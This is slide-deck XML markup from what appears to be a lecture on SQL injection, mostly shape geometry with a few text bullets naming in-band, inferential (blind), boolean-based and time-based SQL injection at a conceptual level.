              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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13968730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30"/>
              <a:t>Inferential </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-390"/>
              <a:t>(Blind) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-270"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1019"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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44752" y="2931714"/>
            <a:ext cx="17108805" cy="637667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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>there </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>actual </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-960">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Just </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-420">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dangerous </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-420">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-530">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" marR="698500" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4190"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1010"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>able </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-775">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reconstruct </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sending </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>particular </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requests  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>observing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resulting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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545">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-455">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DB </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server.</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1080"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-480">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Takes </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>longer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>than </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-805">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1090"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>common </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-535">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Time-based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440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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753015" y="6126589"/>
            <a:ext cx="378396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165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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4260833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260833" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="940404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="917963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="883744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="840350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418943" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410883" y="108117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388439" y="64723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354213" y="30502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310810" y="8059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426083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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
